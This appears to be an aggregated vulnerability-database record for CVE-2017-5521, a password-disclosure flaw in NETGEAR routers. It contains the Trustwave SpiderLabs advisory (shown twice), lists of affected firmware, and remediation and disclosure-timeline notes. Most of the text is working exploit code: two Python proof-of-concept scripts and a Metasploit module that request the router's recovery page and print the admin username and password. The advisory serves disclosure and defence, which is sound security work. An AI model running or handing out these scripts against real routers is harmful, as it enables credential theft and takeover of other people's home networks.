http://router/passwordrecovered.cgi?id=Trustwave_SpiderLabs will give you credentials (some models require you to send a post request instead of get)\n\n## netgore2.py\nimport sys\nimport requests\n\ndef scrape(text, start_trig, end_trig):\n if text.find(start_trig) != -1:\n\treturn text.split(start_trig, 1)[-1].split(end_trig, 1)[0]\n else:\n return \"i_dont_speak_english\"\n#disable nasty insecure ssl warning\nrequests.packages.urllib3.disable_warnings()\n#1st stage\nip = sys.argv[1]\nport = sys.argv[2]\nurl = 'http://' + ip + ':' + port + '/'\ntry:\n\tr = requests.get(url)\nexcept:\n\turl = 'https://' + ip + ':' + port + '/'\n\tr = requests.get(url, verify=False)\nmodel = r.headers.get('WWW-Authenticate')\nif model is not None:\n\tprint \"Attcking: \" + model[13:-1]\nelse:\n\tprint \"not a netgear router\"\n\tsys.exit(0)\n#2nd stage\nurl = url + 'passwordrecovered.cgi?id=get_rekt'\ntry:\n\tr = requests.post(url, verify=False)\nexcept:\n\tprint \"not vulnerable router\"\n\tsys.exit(0)\n#profit\nif r.text.find('left\\\">') != -1:\n\tusername = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))\n\tusername = scrape(username, '>', '\\'')\n\tpassword = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))\n\tpassword = scrape(password, '>', '\\'')\n\tif username == \"i_dont_speak_english\":\n\t\tusername = (scrape(r.text[r.text.find('left\\\">'):-1], 'left\\\">', '</td>'))\n\t\tpassword = (scrape(r.text[r.text.rfind('left\\\">'):-1], 'left\\\">', '</td>'))\nelse:\n\tprint \"not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again\"\n\tsys.exit(0)\n#html encoding pops out of nowhere, lets replace that\npassword = password.replace(\"#\",\"#\")\npassword = password.replace(\"&\",\"&\")\nprint \"user: \" + username\nprint \"pass: \" + password\n\n================================\nJust run the PoC against a router to get the credentials if it is vulnerable.\n\n\n\n\nRemediation Steps:\nPlease see 
NETGEAR's KBA for list of firmware patches for various models. As a \nworkaround, the bug only works when password recovery is NOT set. If you do set \npassword recovery this is not exploitable.\n\nRevision History:\n04/06/2016 - Vulnerability disclosed to vendor\n04/19/2016 - Request for update and received confirmation of receipt of the advisories\n05/18/2016 - Request for update; no response\n07/14/2016 - Request for update\n07/15/2016 - Notice of patch for some models and workaround KBA received along with commitment towards 100% coverage\n10/17/2016 - Request for update\n12/15/2016 - Notice of intent to publish advisories\n01/04/2017 - Vendor responds with patch timeline and announcement of participation in Bugcrowd\n01/30/2017 - Advisory published\n\n\nReferences\n1. http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html\n2. https://www.exploit-db.com/exploits/32883/\n3. http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2017-01-31T10:59:41", "description": "Multiple Netgear Routers - Password Disclosure. CVE-2017-5521. 
Webapps exploit for Hardware platform", "published": "2017-01-30T00:00:00", "type": "exploitdb", "title": "Multiple Netgear Routers - Password Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5521"], "modified": "2017-01-30T00:00:00", "id": "EDB-ID:41205", "href": "https://www.exploit-db.com/exploits/41205/", "sourceData": "Trustwave SpiderLabs Security Advisory TWSL2017-003:\r\nMultiple Vulnerabilities in NETGEAR Routers\r\n\r\nPublished: 01/30/2017 \r\nVersion: 1.0\r\n\r\nVendor: NETGEAR (http://www.netgear.com/)\r\nProduct: Multiple products\r\n\r\nFinding 1: Remote and Local Password Disclosure\r\nCredit: Simon Kenin of Trustwave SpiderLabs\r\nCVE: CVE-2017-5521\r\n\r\nVersion affected: \r\n \r\n# AC1450 V1.0.0.34_10.0.16 (Latest)\r\n# AC1450 V1.0.0.22_1.0.10\r\n# AC1450 V1.0.0.14_1.0.6\r\n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)\r\n# D6400 V1.0.0.34_1.3.34\r\n# D6400 V1.0.0.38_1.1.38\r\n# D6400 V1.0.0.22_1.0.22\r\n# DC112A V1.0.0.30_1.0.60 (Latest)\r\n# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)\r\n# JNDR3000 V1.0.0.18_1.0.16 (Latest)\r\n# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)\r\n# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)\r\n# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)\r\n# R6300\tV1.0.2.78_1.0.58 (Latest)\r\n# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)\r\n# R6300v2 V1.0.3.30_10.0.73\r\n# R6700 V1.0.1.14_10.0.29 (Latest beta)\r\n# R6700 V1.0.0.26_10.0.26 (Latest stable)\r\n# R6700 V1.0.0.24_10.0.18\r\n# R6900 V1.0.0.4_1.0.10 (Latest)\r\n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)\r\n# R8300 V1.0.2.48_1.0.52\r\n# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)\r\n# R8500 V1.0.2.26_1.0.41\r\n# R8500 V1.0.0.56_1.0.28\r\n# R8500 V1.0.0.20_1.0.11\r\n# VEGN2610 V1.0.0.35_1.0.35 (Latest)\r\n# VEGN2610 V1.0.0.29_1.0.29\r\n# VEGN2610 
V1.0.0.27_1.0.27\r\n# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)\r\n# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)\r\n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)\r\n# WNDR4000 V1.0.2.4_9.1.86 (Latest)\r\n# WNDR4500 V1.0.1.40_1.0.68 (Latest)\r\n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)\r\n# WNDR4500v2 V1.0.0.42_1.0.25\r\n# WGR614v10 V1.0.2.60_60.0.85NA (Latest)\r\n# WGR614v10 V1.0.2.58_60.0.84NA\r\n# WGR614v10 V1.0.2.54_60.0.82NA\r\n# WN3100RP V1.0.0.14_1.0.19 (Latest)\r\n# WN3100RP V1.0.0.6_1.0.12\r\n\r\n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)\r\n# Lenovo R3220 V1.0.0.13_1.0.13\r\n\r\n\r\nProduct description:\r\nMultiple Netgear Routers\r\n\r\nMany Netgear routers are prone to password disclosure via simple crafted \r\nrequests to the web management server. The bug is exploitable remotely if the \r\nremote management option is set and can also be exploited given access to the \r\nrouter over LAN or WLAN.\r\n\r\nWhen trying to access the web panel a user is asked to authenticate, if the \r\nauthentication is cancelled and password recovery is not enabled, the user is \r\nredirected to a page which exposes a password recovery token. If a user \r\nsupplies the correct token to the page \r\nhttp://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not \r\nenabled), they will receive the admin password for the router. \r\n\r\nIf password recovery is set the exploit will fail, as it will ask the user for the recovery \r\nquestions which were previously set when enabling the feature, this is \r\npersistent, even after disabling the recovery option the exploit will fail, \r\nbecause the router will ask for the security questions.\r\nThis can easily be reproduced using the attached poc, or by sending these two \r\nsimple requests via the browser:\r\n1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token\r\n2. 
http://router/passwordrecovered.cgi?id=TOKEN will give you credentials (some models require you to send a post request instead of get)\r\n\r\n## netgore.py\r\nimport sys\r\nimport requests\r\n\r\n\r\ndef scrape(text, start_trig, end_trig):\r\n if text.find(start_trig) != -1:\r\n\treturn text.split(start_trig, 1)[-1].split(end_trig, 1)[0]\r\n else:\r\n return \"i_dont_speak_english\"\r\n#disable nasty insecure ssl warning\r\nrequests.packages.urllib3.disable_warnings()\r\n#1st stage - get token\r\nip = sys.argv[1]\r\nport = sys.argv[2]\r\nurl = 'http://' + ip + ':' + port + '/'\r\ntry:\r\n\tr = requests.get(url)\r\nexcept:\r\n\turl = 'https://' + ip + ':' + port + '/'\r\n\tr = requests.get(url, verify=False)\r\nmodel = r.headers.get('WWW-Authenticate')\r\nif model is not None:\r\n\tprint \"Attcking: \" + model[13:-1]\r\nelse:\r\n\tprint \"not a netgear router\"\r\n\tsys.exit(0)\r\ntoken = scrape(r.text, 'unauth.cgi?id=', '\\\"')\r\nif token == 'i_dont_speak_english':\r\n\tprint \"not vulnerable\"\r\n\tsys.exit(0)\r\nprint \"token found: \" + token\r\n#2nd stage - pass the token - get the password\r\nurl = url + 'passwordrecovered.cgi?id=' + token\r\nr = requests.post(url, verify=False)\r\n#profit\r\nif r.text.find('left\\\">') != -1:\r\n\tusername = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))\r\n\tusername = scrape(username, '>', '\\'')\r\n\tpassword = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))\r\n\tpassword = scrape(password, '>', '\\'')\r\n\tif username == \"i_dont_speak_english\":\r\n\t\tusername = (scrape(r.text[r.text.find('left\\\">'):-1], 'left\\\">', '</td>'))\r\n\t\tpassword = (scrape(r.text[r.text.rfind('left\\\">'):-1], 'left\\\">', '</td>'))\r\nelse:\r\n\tprint \"not vulnerable becuse password recovery IS set\"\r\n\tsys.exit(0)\r\n#html encoding pops out of nowhere, lets replace that\r\npassword = password.replace(\"#\",\"#\")\r\npassword = password.replace(\"&\",\"&\")\r\nprint \"user: \" + username\r\nprint \"pass: 
\" + password\r\n\r\n================================\r\nJust run the PoC against a router to get the credentials if it is vulnerable.\r\n\r\n\r\n\r\nFinding 2: Remote and Local Password Disclosure\r\nCredit: Simon Kenin of Trustwave SpiderLabs\r\nCVE: CVE-2017-5521\r\n\r\nVersion affected: \r\n\r\n# AC1450 V1.0.0.34_10.0.16 (Latest)\r\n# AC1450 V1.0.0.22_1.0.10\r\n# AC1450 V1.0.0.14_1.0.6\r\n# D6300 V1.0.0.96_1.1.96 (Latest)\r\n# D6300B V1.0.0.36_1.0.36\r\n# D6300B V1.0.0.32_1.0.32\r\n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)\r\n# D6400 V1.0.0.22_1.0.22\r\n# DC112A V1.0.0.30_1.0.60 (Latest)\r\n# DGN2200v4 V1.0.0.76_1.0.76 (Latest)\r\n# DGN2200v4 V1.0.0.66_1.0.66\r\n# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)\r\n# JNDR3000 V1.0.0.18_1.0.16 (Latest)\r\n# R6200 V1.0.1.56_1.0.43 (Latest)\r\n# R6200 V1.0.1.52_1.0.41\r\n# R6200 V1.0.1.48_1.0.37\r\n# R6200v2 V1.0.3.10_10.1.10 (Latest)\r\n# R6200v2 V1.0.1.20_1.0.18\r\n# R6250 V1.0.4.6_10.1.12 (Latest beta)\r\n# R6250 V1.0.4.2_10.1.10 (Latest stable)\r\n# R6250 V1.0.1.84_1.0.78 \r\n# R6300\tV1.0.2.78_1.0.58 (Latest)\r\n# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)\r\n# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)\r\n# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)\r\n# R6700 V1.0.0.26_10.0.26 (Latest)\r\n# R6700 V1.0.0.24_10.0.18\r\n# R6900 V1.0.0.4_1.0.10 (Latest)\r\n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)\r\n# R7000 V1.0.4.30_1.1.67\r\n# R7900 V1.0.1.8_10.0.14 (Latest beta)\r\n# R7900 V1.0.1.4_10.0.12 (Latest stable)\r\n# R7900 V1.0.0.10_10.0.7\r\n# R7900 V1.0.0.8_10.0.5\r\n# R7900 V1.0.0.6_10.0.4\r\n# R8000 V1.0.3.26_1.1.18 (Latest beta)\r\n# R8000 V1.0.3.4_1.1.2 (Latest stable)\r\n# R8300 V1.0.2.48_1.0.52\r\n# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)\r\n# R8500 V1.0.2.30_1.0.43\r\n# VEGN2610 V1.0.0.35_1.0.35 (Latest)\r\n# VEGN2610 V1.0.0.27_1.0.27\r\n# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)\r\n# VEVG2660 
V1.0.0.23_1.0.23\r\n# WNDR3400v2 V1.0.0.52_1.0.81 (Latest)\r\n# WNDR3400v3 V1.0.1.4_1.0.52 (Latest)\r\n# WNDR3400v3 V1.0.1.2_1.0.51\r\n# WNDR3400v3 V1.0.0.22_1.0.29\r\n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)\r\n# WNDR4000 V1.0.2.4_9.1.86 (Latest)\r\n# WNDR4500 V1.0.1.40_1.0.68 (Latest)\r\n# WNDR4500 V1.0.1.6_1.0.24 \r\n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)\r\n# WNDR4500v2 V1.0.0.50_1.0.30\r\n# WNR1000v3 V1.0.2.68_60.0.93NA (Latest)\r\n# WNR1000v3 V1.0.2.62_60.0.87 (Latest)\r\n# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)\r\n# WNR3500Lv2 V1.2.0.32_40.0.74\r\n# WGR614v10 V1.0.2.60_60.0.85NA (Latest)\r\n# WGR614v10 V1.0.2.58_60.0.84NA\r\n# WGR614v10 V1.0.2.54_60.0.82NA\r\n\r\n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)\r\n# Lenovo R3220 V1.0.0.13_1.0.13\r\n\r\n\r\nMany Netgear routers are prone to password disclosure via a simple crafted \r\nrequest to the web management server. The bug is exploitable remotely if the \r\nremote management option is set and can also be exploited given access to the \r\nrouter over LAN or WLAN.\r\n\r\nNetgear routers have an option to restore a forgotten password via 2 security \r\nquestions. If the recovery option is disabled (which is the default), it is \r\nstill possible to recover the password by sending a correct token to the \r\nrecovery page. \r\n\r\nIf a user supplies the correct token to the page \r\nhttp://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not \r\nenabled), they will receive the admin password for the router. 
If password \r\nrecovery is set, the exploit will fail, as the router will ask the user for the recovery \r\nquestions which were previously set when enabling the feature. This is \r\npersistent: even after disabling the recovery option, the exploit will still fail, \r\nbecause the router will ask for the security questions.\r\n\r\nThis mechanism does not work correctly on the very first request to \r\n\"passwordrecovered.cgi\", where the token is not properly checked; this means that \r\nany TOKEN value will result in disclosure of the password.\r\nThe issue occurs again after every reboot of the router.\r\n\r\nThis can easily be reproduced using the attached PoC, or by sending a simple \r\nrequest via the browser:\r\n1. http://router/passwordrecovered.cgi?id=Trustwave_SpiderLabs will give you the credentials (some models require you to send a POST request instead of a GET)\r\n\r\n## netgore2.py\r\nimport sys\r\nimport requests\r\n\r\ndef scrape(text, start_trig, end_trig):\r\n\tif text.find(start_trig) != -1:\r\n\t\treturn text.split(start_trig, 1)[-1].split(end_trig, 1)[0]\r\n\telse:\r\n\t\treturn \"i_dont_speak_english\"\r\n#disable nasty insecure ssl warning\r\nrequests.packages.urllib3.disable_warnings()\r\n#1st stage\r\nip = sys.argv[1]\r\nport = sys.argv[2]\r\nurl = 'http://' + ip + ':' + port + '/'\r\ntry:\r\n\tr = requests.get(url)\r\nexcept:\r\n\turl = 'https://' + ip + ':' + port + '/'\r\n\tr = requests.get(url, verify=False)\r\nmodel = r.headers.get('WWW-Authenticate')\r\nif model is not None:\r\n\tprint \"Attacking: \" + model[13:-1]\r\nelse:\r\n\tprint \"not a netgear router\"\r\n\tsys.exit(0)\r\n#2nd stage\r\nurl = url + 'passwordrecovered.cgi?id=get_rekt'\r\ntry:\r\n\tr = requests.post(url, verify=False)\r\nexcept:\r\n\tprint \"not vulnerable router\"\r\n\tsys.exit(0)\r\n#profit\r\nif r.text.find('left\\\">') != -1:\r\n\tusername = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))\r\n\tusername = scrape(username, '>', '\\'')\r\n\tpassword = (repr(scrape(r.text, 'Router 
Admin Password</td>', '</td>')))\r\n\tpassword = scrape(password, '>', '\\'')\r\n\tif username == \"i_dont_speak_english\":\r\n\t\tusername = (scrape(r.text[r.text.find('left\\\">'):-1], 'left\\\">', '</td>'))\r\n\t\tpassword = (scrape(r.text[r.text.rfind('left\\\">'):-1], 'left\\\">', '</td>'))\r\nelse:\r\n\tprint \"not vulnerable router, or someone else already accessed passwordrecovered.cgi, reboot router and test again\"\r\n\tsys.exit(0)\r\n#html encoding pops out of nowhere, let's replace that\r\npassword = password.replace(\"#\",\"#\")\r\npassword = password.replace(\"&\",\"&\")\r\nprint \"user: \" + username\r\nprint \"pass: \" + password\r\n\r\n================================\r\nJust run the PoC against a router to get the credentials if it is vulnerable.\r\n\r\n\r\n\r\n\r\nRemediation Steps:\r\nPlease see NETGEAR's KBA for the list of firmware patches for various models. As a \r\nworkaround, note that the bug only works when password recovery is NOT set. If you do set \r\npassword recovery, this is not exploitable.\r\n\r\nRevision History:\r\n04/06/2016 - Vulnerability disclosed to vendor\r\n04/19/2016 - Request for update and received confirmation of receipt of the advisories\r\n05/18/2016 - Request for update; no response\r\n07/14/2016 - Request for update\r\n07/15/2016 - Notice of patch for some models and workaround KBA received along with commitment towards 100% coverage\r\n10/17/2016 - Request for update\r\n12/15/2016 - Notice of intent to publish advisories\r\n01/04/2017 - Vendor responds with patch timeline and announcement of participation in Bugcrowd\r\n01/30/2017 - Advisory published\r\n\r\n\r\nReferences\r\n1. http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html\r\n2. https://www.exploit-db.com/exploits/32883/\r\n3. 
http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability\r\n\r\n\r\nAbout Trustwave:\r\nTrustwave is the leading provider of on-demand and subscription-based\r\ninformation security and payment card industry compliance management\r\nsolutions to businesses and government entities throughout the world. For\r\norganizations faced with today's challenging data security and compliance\r\nenvironment, Trustwave provides a unique approach with comprehensive\r\nsolutions that include its flagship TrustKeeper compliance management\r\nsoftware and other proprietary security solutions. Trustwave has helped\r\nthousands of organizations--ranging from Fortune 500 businesses and large\r\nfinancial institutions to small and medium-sized retailers--manage\r\ncompliance and secure their network infrastructure, data communications and\r\ncritical information assets. Trustwave is headquartered in Chicago with\r\noffices throughout North America, South America, Europe, Africa, China and\r\nAustralia. For more information, visit https://www.trustwave.com\r\n\r\nAbout Trustwave SpiderLabs:\r\nSpiderLabs(R) is the advanced security team at Trustwave focused on\r\napplication security, incident response, penetration testing, physical\r\nsecurity and security research. The team has performed over a thousand\r\nincident investigations, thousands of penetration tests and hundreds of\r\napplication security tests globally. In addition, the SpiderLabs Research\r\nteam provides intelligence through bleeding-edge research and proof of\r\nconcept tool development to enhance Trustwave's products and services.\r\nhttps://www.trustwave.com/spiderlabs\r\n\r\nDisclaimer:\r\nThe information provided in this advisory is provided \"as is\" without\r\nwarranty of any kind. Trustwave disclaims all warranties, either express or\r\nimplied, including the warranties of merchantability and fitness for a\r\nparticular purpose. 
In no event shall Trustwave or its suppliers be liable\r\nfor any damages whatsoever including direct, indirect, incidental,\r\nconsequential, loss of business profits or special damages, even if\r\nTrustwave or its suppliers have been advised of the possibility of such\r\ndamages. Some states do not allow the exclusion or limitation of liability\r\nfor consequential or incidental damages so the foregoing limitation may not\r\napply.", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/41205/"}], "metasploit": [{"lastseen": "2019-12-17T16:12:24", "description": "This module will collect the password for the `admin` user. The exploit will not complete if password recovery is set on the router. The password is received by passing the token generated from `unauth.cgi` to `passwordrecovered.cgi`. This exploit works on many different NETGEAR products. The full list of affected products is available in the 'References' section.\n", "published": "2017-02-05T18:39:58", "type": "metasploit", "title": "NETGEAR Administrator Password Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5521"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/GATHER/NETGEAR_PASSWORD_DISCLOSURE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'NETGEAR Administrator Password Disclosure',\n 'Description' => %q{\n This module will collect the password for the `admin` user.\n The exploit will not complete if password recovery is set on the router.\n The password is received by passing the token generated from `unauth.cgi`\n to `passwordrecovered.cgi`. This exploit works on many different NETGEAR\n products. 
The full list of affected products is available in the 'References'\n section.\n\n },\n 'Author' =>\n [\n 'Simon Kenin', # Vuln Discovery, PoC\n 'thecarterb' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2017-5521' ],\n [ 'URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911' ],\n [ 'URL', 'http://thehackernews.com/2017/01/Netgear-router-password-hacking.html'],\n [ 'URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2017-5521--Bypassing-Authentication-on-NETGEAR-Routers/'],\n [ 'URL', 'http://pastebin.com/dB4bTgxz'],\n [ 'EDB', '41205']\n ],\n 'License' => MSF_LICENSE\n ))\n\n register_options(\n [\n OptString::new('TARGETURI', [true, 'The base path to the vulnerable application', '/'])\n ])\n end\n\n # @return substring of 'text', usually a response from a server in this case\n def scrape(text, start_trig, end_trig)\n text[/#{start_trig}(.*?)#{end_trig}/m, 1]\n end\n\n def run\n uri = target_uri.path\n uri = normalize_uri(uri)\n print_status(\"Checking if #{rhost} is a NETGEAR router\")\n vprint_status(\"Sending request to http://#{rhost}/\")\n\n # will always call check no matter what\n is_ng = check\n\n res = send_request_cgi({ 'uri' => uri })\n if res.nil?\n print_error(\"#{rhost} returned an empty response.\")\n return\n end\n\n if is_ng == Exploit::CheckCode::Detected\n marker_one = \"id=\"\n marker_two = \"\\\"\"\n token = scrape(res.to_s, marker_one, marker_two)\n if token.nil?\n print_error(\"#{rhost} is not vulnerable: Token not found\")\n return\n end\n\n if token == '0'\n print_status(\"If no creds are found, try the exploit again. 
#{rhost} returned a token of 0\")\n end\n print_status(\"Token found: #{token}\")\n vprint_status(\"Token found at #{rhost}/unauth.cgi?id=#{token}\")\n\n r = send_request_cgi({\n 'uri' => \"/passwordrecovered.cgi\",\n 'vars_get' => { 'id' => token }\n })\n\n vprint_status(\"Sending request to #{rhost}/passwordrecovered.cgi?id=#{token}\")\n\n html = r.get_html_document\n raw_html = html.text\n\n username = scrape(raw_html, \"Router Admin Username\", \"Router Admin Password\")\n password = scrape(raw_html, \"Router Admin Password\", \"You can\")\n if username.nil? || password.nil?\n print_error(\"#{rhost} returned empty credentials\")\n return\n end\n username.strip!\n password.strip!\n\n if username.empty? || password.empty?\n print_error(\"No Creds found\")\n else\n print_good(\"Creds found: #{username}/#{password}\")\n end\n else\n print_error(\"#{rhost} is not vulnerable: Not a NETGEAR device\")\n end\n end\n\n # Almost every NETGEAR router sends a 'WWW-Authenticate' header in the response\n # This checks the response for that header.\n def check\n\n res = send_request_cgi({'uri'=>'/'})\n if res.nil?\n fail_with(Failure::Unreachable, 'Connection timed out.')\n end\n\n # Checks for the `WWW-Authenticate` header in the response\n if res.headers[\"WWW-Authenticate\"]\n data = res.to_s\n marker_one = \"Basic realm=\\\"\"\n marker_two = \"\\\"\"\n model = data[/#{marker_one}(.*?)#{marker_two}/m, 1]\n print_good(\"Router is a NETGEAR router (#{model})\")\n return Exploit::CheckCode::Detected\n else\n print_error('Router is not a NETGEAR router')\n return Exploit::CheckCode::Safe\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/netgear_password_disclosure.rb", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}]}